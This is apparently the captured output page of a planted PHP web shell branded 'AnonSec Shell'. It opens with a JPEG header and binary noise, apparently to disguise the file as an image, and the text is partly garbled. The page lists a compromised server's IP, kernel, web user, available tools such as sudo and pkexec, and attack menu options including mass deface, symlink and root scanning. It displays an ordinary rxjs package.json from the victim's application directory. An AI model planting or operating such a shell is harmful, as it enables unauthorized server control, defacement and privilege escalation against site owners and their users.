JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 172.67.142.142  /  Your IP : 104.23.243.116   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/app/comcon25/comcon-2025-cms/node_modules/rxjs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/app/comcon25/comcon-2025-cms/node_modules/rxjs/package.json
{
  "name": "rxjs",
  "version": "6.6.7",
  "description": "Reactive Extensions for modern JavaScript",
  "main": "./index.js",
  "sideEffects": false,
  "config": {
    "commitizen": {
      "path": "cz-conventional-changelog"
    }
  },
  "nyc": {
    "include": [
      "src/*.ts",
      "src/**/*.ts"
    ],
    "exclude": [
      "node_modules",
      "dist",
      "*.d.ts",
      "src/**/MiscJSDoc.ts"
    ],
    "extension": [
      ".ts"
    ],
    "reporter": [
      "html"
    ],
    "all": true
  },
  "lint-staged": {
    "linters": {
      "*.@(js)": [
        "eslint --fix",
        "git add"
      ],
      "*.@(ts)": [
        "tslint --fix",
        "git add"
      ]
    },
    "ignore": [
      "spec-dtslint/**/*.{js,ts}",
      "api_guard/**/*.{js,ts}"
    ]
  },
  "repository": {
    "type": "git",
    "url": "https://github.com/reactivex/rxjs.git"
  },
  "keywords": [
    "Rx",
    "RxJS",
    "ReactiveX",
    "ReactiveExtensions",
    "Streams",
    "Observables",
    "Observable",
    "Stream",
    "ES6",
    "ES2015"
  ],
  "author": "Ben Lesh <ben@benlesh.com>",
  "contributors": [
    {
      "name": "Ben Lesh",
      "email": "ben@benlesh.com"
    },
    {
      "name": "Paul Taylor",
      "email": "paul.e.taylor@me.com"
    },
    {
      "name": "Jeff Cross",
      "email": "crossj@google.com"
    },
    {
      "name": "Matthew Podwysocki",
      "email": "matthewp@microsoft.com"
    },
    {
      "name": "OJ Kwon",
      "email": "kwon.ohjoong@gmail.com"
    },
    {
      "name": "Andre Staltz",
      "email": "andre@staltz.com"
    }
  ],
  "license": "Apache-2.0",
  "bugs": {
    "url": "https://github.com/ReactiveX/RxJS/issues"
  },
  "homepage": "https://github.com/ReactiveX/RxJS",
  "dependencies": {
    "tslib": "^1.9.0"
  },
  "devDependencies": {
    "@angular-devkit/build-optimizer": "0.4.6",
    "@angular-devkit/schematics": "^0.5.4",
    "@types/chai": "4.1.2",
    "@types/lodash": "4.14.102",
    "@types/mocha": "2.2.48",
    "@types/node": "9.4.5",
    "@types/sinon": "4.1.3",
    "@types/sinon-chai": "2.7.29",
    "@types/source-map": "^0.5.2",
    "babel-polyfill": "6.26.0",
    "benchmark": "2.1.0",
    "benchpress": "2.0.0-beta.1",
    "chai": "4.1.2",
    "check-side-effects": "0.0.20",
    "color": "3.0.0",
    "colors": "1.1.2",
    "commitizen": "2.9.6",
    "coveralls": "3.0.0",
    "cross-env": "5.1.3",
    "cz-conventional-changelog": "1.2.0",
    "danger": "1.1.0",
    "dependency-cruiser": "2.13.0",
    "doctoc": "1.3.0",
    "dtslint": "0.6.1",
    "escape-string-regexp": "1.0.5",
    "esdoc": "0.4.7",
    "eslint": "4.17.0",
    "eslint-plugin-jasmine": "^2.10.1",
    "fs-extra": "5.0.0",
    "get-folder-size": "1.0.1",
    "glob": "7.1.2",
    "gm": "1.23.1",
    "google-closure-compiler-js": "20170218.0.0",
    "gzip-size": "4.1.0",
    "http-server": "0.11.1",
    "husky": "0.14.3",
    "klaw-sync": "3.0.2",
    "lint-staged": "7.1.1",
    "lodash": "4.17.5",
    "markdown-doctest": "0.9.1",
    "minimist": "1.2.0",
    "mkdirp": "^1.0.4",
    "mocha": "5.0.0",
    "mocha-in-sauce": "0.0.1",
    "npm-run-all": "4.1.2",
    "nyc": "11.4.1",
    "opn-cli": "3.1.0",
    "platform": "1.3.5",
    "promise": "8.0.1",
    "protractor": "3.1.1",
    "rollup": "0.66.6",
    "rollup-plugin-alias": "1.4.0",
    "rollup-plugin-inject": "2.0.0",
    "rollup-plugin-node-resolve": "2.0.0",
    "rx": "latest",
    "rxjs": "^5.5.7",
    "shx": "^0.3.2",
    "sinon": "4.3.0",
    "sinon-chai": "2.14.0",
    "source-map-support": "0.5.3",
    "symbol-observable": "1.0.1",
    "systemjs": "^0.21.0",
    "ts-api-guardian": "^0.5.0",
    "ts-node": "6.1.0",
    "tsconfig-paths": "3.2.0",
    "tslint": "5.9.1",
    "tslint-etc": "1.2.6",
    "tslint-no-toplevel-property-access": "0.0.2",
    "tslint-no-unused-expression-chai": "0.0.3",
    "typescript": "^3.0.1",
    "validate-commit-msg": "2.14.0",
    "webpack": "1.13.1",
    "xmlhttprequest": "1.8.0"
  },
  "engines": {
    "npm": ">=2.0.0"
  },
  "typings": "./index.d.ts",
  "ng-update": {
    "migrations": "./migrations/collection.json"
  },
  "module": "./_esm5/index.js",
  "es2015": "./_esm2015/index.js"
}

Anon7 - 2022
AnonSec Team